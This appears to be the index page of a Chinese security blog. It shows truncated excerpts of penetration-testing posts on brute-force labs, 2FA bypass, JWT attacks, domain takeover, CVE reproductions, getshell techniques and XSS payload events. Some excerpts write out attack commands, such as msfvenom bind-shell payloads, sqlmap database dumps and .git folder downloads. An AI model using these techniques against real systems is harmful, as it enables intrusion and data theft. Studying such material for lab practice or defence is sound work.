anlalu233的博客

原创 API 的5 大身份验证安全隐患

文章来源：嘶吼专业版目录未经身份验证的 API使用非空值身份验证令牌的 APIAPI经过身份验证，但未经授权API令牌扩散带有不正确授权逻辑的API总结最近一连串的 API 安全事件（Peloton、Experian、Clubhouse 等）无疑迫使许多安全和开发团队仔细检查他们的 API 安全状况，以确保它们不会成为下一个被攻击对象。创建面向外部受众的所有API的清单是组织在组合或重新评估API安全程序时最常见的出发点。有了这个清单，下一步是评估每个暴露的 API 的潜在安全风险，比如弱身份验证或以明

原创 版本控制历史中的信息披露

1.首先我们先把/.git文件夹下载下来wget -r https://[靶场ID].web-security-academy.net/.git下载完成：2.然后查看里面的HEAD文件我是在安装过程中直接看到了路径所以进入HEAD路径：cd ac471f6d1ebbc8b681f4577e001600d4.web-security-academy.net/.git/logs/HEAD但发现不行：所以先进入上层目录再ls找到HEAD文件：cd ac471f6d1ebbc8b68.

原创 思维导图：访问控制和权限提升

原创 身份验证：2FA 简单旁路（双因素身份验证。已获得有效的用户名和密码，但无权访问2FA 验证码）

使用已知账号密码登录：此时为让输入验证码的页面：单击“电子邮件客户端”按钮：即：点击返回实验室：点击我的账户：此时是wiener的账户，记下 URL：https://acf71f971f302381800d33d100e200b9.web-security-academy.net/my-account?id=wiener点击登出注销wiener的账户：点击我的账户使用受害者 carlos:montoya登录：在此输入受害者账户验证码的页面将urlhttps://acf71f.

原创 暴力破解：破坏蛮力保护，每个请求多个凭证（单个请求猜测多个密码，密码以字符串数组方式爆破）

需要将给的密码改为数组形式：1.2.替换后将多余的头尾删掉并加上[ ]

原创 暴力破解：通过帐户锁定的用户名枚举

第一个直接放用户名字典就不说了。第二个选择“Null payloads”类型并选择生成 5 个有效载荷的选项。这将有效地导致每个用户名重复 5 次。开始攻击。爆破出用户名：将用户名代入，爆破密码：成功爆破出密码：...

原创 暴力破解：破解强力保护、IP 封锁（连续提交 3 次错误登录封IP 的情况下）

首先制作用户名和密码的字典制作用户名字典：我是采用wiener carlos重复100次的方式制作：strings = "wiener\r\ncarlos" # 字符串变量for i in range(100): print(strings)制作密码字典：使用EverEdit注意先将第一行空着再替换：替换完后是这样的：再将空的第一行删掉：因为网络问题，还是把线程调到1为好，要不然大概率出错...

原创 暴力破解：通过响应时间枚举用户名

突破IP限制：http请求头中添加X-Forwarded-For头，将该头的value设置为动态参数变化。使用正常的用户名和密码登录观察响应时间，使用错误的用户名和密码登录观察响应时间。当用户名错误时响应时间基本一样，当用户名正常时，随着密码的长度越长响应时间越长。登录请求拦截发送到Burp Intruder，http请求头中添加X-Forwarded-For:192.168.10.1 后面的1添加有效载核username添加有效载核，password长度设置100个字符以上。切换到有效载

原创 暴力破解：利用正则功能自动提取爆破结果中的特征值

通常暴力破解账号和密码时是因为回复不同从而判断是否可以暴力破解，比如：账号错误时返回“账号错误”或“账号不存在”等等；密码错误时返回“密码错误”。但有一种情况是用户名错误或密码错误的响应状态码是相同的，比如返回：“账号或密码错误”或“无效的用户名或密码”，但是响应包正文会有一点差异，所以我们可以利用正则功能自动提取爆破结果中的特征值。案例一：爆破用户名：导入字典后：在选项options下->Grep-Extract->add单击“添加”。在出现的对话框中，向下滚动响应，直到

原创 AccessKey泄露利用

被泄露的OSS密钥（阿里云OSS使用前端直传的危害）由swagger引发的OSS AccessKey泄露阿里云主机泄露Access Key到getshell

转载 【看过不等于学会】JWT攻击手册：如何入侵你的Token

JSON Web Token（JWT）对于渗透测试人员而言，可能是一个非常吸引人的攻击途径。因为它不仅可以让你伪造任意用户获得无限的访问权限，而且还可能进一步发现更多的安全漏洞，如信息泄露，越权访问，SQLi，XSS，SSRF，RCE，LFI等。首先我们需要识别应用程序正在使用JWT，最简单的方法是在代理工具的历史记录中搜索JWT正则表达式：[= ]ey[A-Za-z0-9_-].[A-Za-z0-9._-] -网址安全的JWT版本 [=]ey[A-Za-z0-9_/±].[A-Za

转载 【看过不等于学会】一切从资产梳理开始--bypass

如果要入侵一台服务器，从开放的端口服务下手；那么，如果要入侵一家企业，从互联网暴露面资产进行探测，主要围绕域名、IP进行信息收集。你了解过你所在的企业有多少资产暴露在外网吗？通过防火墙发布外网，这里的内外网映射关系+域名解析记录，构成了一条完整的网络链路，而这些链路决定了有多少资产暴露在互联网上。 不少企业都存在资产不清晰的问题，各种历史遗留问题，如业务端口开通没有进行登记管理，或者项目交接、人员调动等客观因素，导致企业外网资产一直存在混乱状态，隐形资产成为了攻击者的切入点。站在攻击者的角度来做防护，

原创 phpMyAdmin 渗透利用总结

https://www.nps.ink/404366.htmlhttps://my.oschina.net/u/4149042/blog/4418204https://mp.weixin.qq.com/s?__biz=MzU2MjM4NDYxOQ==&mid=2247485058&idx=1&sn=7ec6af6fb1f5f35f7d3dd027f652c5a1&scene=21#wechat_redirecthttps://blog.csdn.net/sinat_3.

原创 序列化与反序列化：修改序列化对象

靶场链接https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects解决步骤截图：1.使用您自己的凭据登录。请注意，登录后GET /请求包含一个会话cookie，该会话cookie似乎是URL并以Base64编码的。将此请求发送到打p中继器。另外，突出显示cookie值，然后从上下文菜单中选择“发送到解码器”。登录 发送到repeater

原创 给kali安装代理proxychains

安装：sudo apt install proxychains配置：sudo vim /etc/proxychains.conf（要用sudo进入root模式否之保存不了）在这个配置文件最下面有[ProxyList]这么一行，在这行下面添加上socks5 127.0.0.1 1080如果有别的比如socks4 127.0.0.1 9050那么就把它给注释掉。按 i 进入编辑，保存退出按esc，再同时敲下shift和; ，再输入wq，回车即可。使用如果你只是给一个命令实现代理，比如你要g

原创 网络摘抄-绿盟UTS综合威胁探针管理员任意登录漏洞（HW0day）

漏洞详情：绿盟全流量威胁分析解决方案针对原始流量进行采集和监控，对流量信息进行深度还原、存储、查询和分析，可以及时掌握重要信息系统相关网络安全威胁风险，及时检测漏洞、病毒木马、网络攻击情况，及时发现网络安全事件线索，及时通报预警重大网络安全威胁，调查、防范和打击网络攻击等恶意行为，保障重要信息系统的网络安全。存在版本：绿盟综合威胁探针设备版本V2.0R00F02SP02及之前存在此漏洞。处置意见:建议尽快更新补丁至最新： http://update.nsfocus.com/update/listB

转载 CRLF Injection漏洞的利用与实例分析

记者地址：http://drops.wooyun.org/papers/24660x00背景我看区域中（http://zone.wooyun.org/content/13323）还有一些同学对于这个突破不甚了解，甚至分不清它与CSRF，我详细说一下吧。在HTTP协议中，HTTP标头与HTTP正文是用两个CRLF分隔的，浏览器就是根据这两个CRLF来取回HTTP内容并显示出来的。CRLF是“回车+换行”（\ r \ n）的简称。 。所以，一旦我们能够控制HTTP消息头中的字符，注入一些恶...

转载 内网渗透靶场（下）拿下域控 #zkaq

　　内网往往有好多台服务器组成集群，为了方便管理，windwos系统可以通过域批量管理；管理员直接操作的服务器称为控制器，能操控域里面所有的节点，概念上类似于master；其余节点可通过master批量被操作，概念上类似于slave，俗称客户机；拿下控制节点，就等于拿下了整个域；　　1、这里假设先拿下了一台客户机，远程桌面登陆，上传猕猴桃，先扫描内存，找到域下面的administrator账号，：Authentication Id : 0 ; 381160 (00000000:0005d0e8)

转载 内网渗透靶场（上）加入目标网段，抓取管理员密码 #zkaq

1、探测是否有sql注入：（1）从ur看， 传递了id=1这个参数；这里有可能涉及到和数据库交互，为了确认是否存在sql注入，这里故意构造and 1=2这个false的条件，看看页面返回啥：（2）果然页面报错，说明存在sql注入，并且还有个关键信息：当前页面在C:\phpStudy\WWW\这个目录下；（3）通过order by看看当前表有多少字段：order by 2是正常的，order by 3就异常了，说明有2个字段；（4）接着看看页面有没有报错点，方便后续观察结果...

转载 jQuery3.0.0-3.5.0版本xss漏洞浅析、复现、修复

jQuery最新xss漏洞浅析、复现2.1 环境搭建对于此漏洞原作者搭建了在线环境，内置了三个xss poc，点击Append via .html()按钮即可触发xss环境链接：https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html2.2 源码分析先用第一个红框模拟个开发环境，虽然三个poc都使用了包含onerror事件的img标签，但其实它们是放在属性或style元素内部，因此会绕过HTML清理器。审查元素发现，点击之后会多出现一个闭

原创 实战：盒子的self-xss（盒子已忽略）

盒子的self-xss是我在提交一个其他网站的xss时，编辑框输入了xss代码，没想到盒子弹窗了。我惊喜地想没想到盒子自己竟然有洞，然后我兴高采烈地提交了盒子，盒子很快回复了我说该漏洞已知晓，self-xss不存在危害性，故忽略。我一盆凉水浇下来。（小声说：盒子一看到自己平台的洞审核超快，第二天就审核回复我了，而我另一个同时间提交的xss漏洞还没审核emmmm）图片...

转载 32个触发事件XSS语句的总结

32个触发事件XSS语句的总结http://hi.baidu.com/cr3xdker/blog/item/02f94520c1e39c56ad34dee6.html1、onmouseenter：当鼠标进入选区执行代码2、onmouseleave：当鼠标离开选区执行代码3、onmousewheel：当鼠标在选区滚轮时执行代码4、onscroll：拖动滚动条执行代码1234565、onfocusin：当获得焦点时执行代码6、onfocusout：当失去焦点时执行代码7、

原创 cve2020-0796代码执行漏洞复现详细过程（不成功）

win10：192.168.254.129kali：192.168.254.128生成反向连接木马：msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f pythonkali打开msf:use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 4444set rhost 192.168.254.1

原创 实战：某网站的SQL注入（php+mysql+Apache）

1.列出所有数据库sqlmap -u “http://www.aaa.com/a.php?id=2” --dbs2.列出数据库"hailc0218"的所有表sqlmap -u “http://www.aaa.com/a.php?id=2” --tables -D"hailc0218"3.列出数据库"hailc0218"表“user”的所有字段sqlmap -u “http://www...

原创 kali2020.1更新sqlmap（按官方步骤不行的来看）

cd /usr/share/sudo rm -rf sqlmapsudo git clone https://github.com/sqlmapproject/sqlmap(如果不是root权限，是kali用户就要加sudo)

原创 CVE-2020-7471漏洞复现（SQL注入）

1.漏洞影响范围/受影响版本Django 1.11.x < 1.11.28Django 2.2.x < 2.2.10Django 3.0.x < 3.0.3Django 主开发分支/不受影响产品版本Django 1.11.28Django 2.2.10Django 3.0.32.前期准备查看：以下参考https://blog.csdn.net/qq_412...

原创 业务逻辑漏洞都有哪些？渗透时参考

原创 CVE-2020-1938/CNVD-2020-10487：Apache Tomcat 远程执行代码漏洞

背景Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器，按照Sun Microsystems提供的技术规范，实现了对Servlet和JavaServer Page（JSP）的支持。Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器，因此也可以视作单独的Web服务器。此漏洞为文件...

原创 CVE-2020-0796 SMBv3漏洞蓝屏复现+提权

1.漏洞简介Microsoft Windows和Microsoft Windows Server都是美国微软（Microsoft）公司的产品，Microsoft Windows是一套个人设备使用的操作系统，Microsoft Windows Server是一套服务器操作系统，Server Message Block是其中的一个服务器信息传输协议。微软公布了在Server Message Blo...

原创 针对sql注入你都了解吗？（面试）

你能简述SQL注入漏洞的本质是什么吗？根据漏洞场景的不同都有哪些类型？根据利用方式的不同又有那些类型？它们中哪些跑数据最快，哪些几乎适用于所有情况？报错注入的原理是什么？联合查询注入又有哪些要点？黑盒测试中如何快速寻找SQL注入漏洞？白盒审计呢？根据经验，哪些位置可能出现SQL注入漏洞？如果你发现了一个SQL注入，你会如何利用？一个盲注如何快速跑数据？前置条件有哪些？如果有WAF，你知道几种过WA...

原创 SlowHTTPTest-慢速DoS攻击

https://www.cnblogs.com/daoyi/p/SlowHTTPTestman-suDoS-gong-ji.html

原创 cve-2019-0232Apache Tomcat远程代码执行漏洞打开计算器

一、 漏洞简介1.漏洞编号和级别CVE编号：CVE-2019-0232，危险级别：高危，CVSS分值：官方未评定。2.漏洞概述Apache Tomcat是美国阿帕奇（Apache）软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page（JSP）的支持。4月11日，Apache官方发布通告称将在最新版本中修复一个远程代码执行漏洞（CVE-201...

原创 勒索病毒感染的应急流程

原创 通过漏洞组合利用实现企业内网入侵

https://www.sohu.com/a/129128214_262549

转载 网站后台getshell的方法总结

方法一：直接上传getshell以dedecms为例，后台可以直接上传脚本文件，从而getshell，具体方法如下：即可成功上传大马，并成功执行，从而拿下webshell。坑：通常由于权限限制，导致只有该目录权限，无法进入其他目录，此时便可以采用…/跳转到根目录，或者其他目录，此时所采用的方法是如下的文件改名方法二：数据库备份getshell以南方数据cms为例：1，首先上传一张...

原创 OSCP 备考指南

OSCP 备考指南https://www.lshack.cn/656/

转载 梦想v1.4 CMS平台XSS与代码审计分析

https://www.freebuf.com/vuls/218838.html

转载 AWVS10.5 详细中文手册

https://www.freebuf.com/sectool/100713.html以下截取部分①：Scan single website：在Website URL处填入需要扫描的网站网址，如果你想要扫描一个单独的应用程序，而不是整个网站，可以在填写网址的地方写入完整路径。wvs支持HTTP/HTTPS网站扫描。②：Scan using saved crawling results：导入...

转载 渗透测试常见开放端口及利用

https://www.cnblogs.com/iAmSoScArEd/p/10564262.html

转载 sqlmap识别网站WAF_如何判断网站WAF

sqlmap中自带了识别waf的模块可以识别出网站的waf种类，如果安装的waf没有什么特征，识别出来的就是：Generic。sqlmap识别命令：sqlmap.py -u “http://www.xxx.com” --identify-waf --batch详细的识别规则在sqlmap的waf目录下，也可以自己编写规则，写好了直接放waf目录下即可。转载于:https://www.cnb...